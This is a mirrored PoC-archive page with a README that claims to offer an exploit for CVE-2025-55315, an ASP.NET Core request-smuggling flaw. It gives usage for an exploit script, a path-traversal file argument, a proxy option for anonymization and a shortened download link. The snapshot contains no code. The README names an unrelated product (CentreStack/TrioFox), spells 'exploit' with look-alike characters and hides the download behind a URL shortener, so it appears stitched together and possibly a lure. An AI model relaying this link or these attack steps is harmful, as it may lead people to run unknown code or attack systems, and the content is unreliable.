Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-55315 PoC — ASP.NET Security Feature Bypass Vulnerability

Source
https://github.com/RootAid/CVE-2025-55315
Associated Vulnerability
Title:ASP.NET Security Feature Bypass Vulnerability (CVE-2025-55315)
Description:Inconsistent interpretation of http requests ('http request/response smuggling') in ASP.NET Core allows an authorized attacker to bypass a security feature over a network.
Readme
# CVE-2025-55315

### Overview
A critical vulnerability in ASP.NET Core involving inconsistent interpretation of HTTP requests, enabling HTTP request/response smuggling. The flaw affects ASP.NET Core versions 2.3, 8.0, 9.0, allowing an authorized attacker to bypass security features over a network.

### Versions
Asp.net Core 8.0
Asp.net Core 9.0
Asp.net Core 2.3
Microsoft Visual Studio 2022 Version 17.12

### Published Date
14 October 2025

### Key Points

- **Severity**: Critical
- **CVSS Score**: 9.9 (High)
- **Confidentiality**: High
- **Integrity**: High
- **Availability**: High
- **Attack Vector**: Network
- **Attack Complexity**: Low
- **Privileges Required**: Low

### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)

### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the explоit: `python explоit.py --target <target_url> --file "/path/to/Web.config"`


### How It Works
An attacker with low-privilege network access can: - Bypass front-end security controls - View sensitive data including user credentials - Modify server files - Potentially hijack user sessions - Breach security boundaries between system components The vulnerability has a high severity with significant impacts on confidentiality, integrity, and potential unauthorized access.

Options:
- `--target`: URL of the vulnerable CentreStack/TrioFox instance.
- `--file`: Relative path to the file to include (e.g., "../../../../Windows/system.ini" for testing).
- `--proxy`: Optional HTTP proxy for anonymization.


### Ethical Use Warning
- This script is a proof-of-concept for CVE-2025-55315 for educational and authorized security testing purposes.
- **Do not use this script on systems without explicit permission from the system owner.**
- Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
- Always obtain written consent before testing any system.

### PoC explоit download [here](https://tinyurl.com/3rht2j66)
File Snapshot

 [4.0K]  /data/pocs/669ee8be604754317b1d06b78485a11aad02f470
└── [2.0K]  README.md

1 directory, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →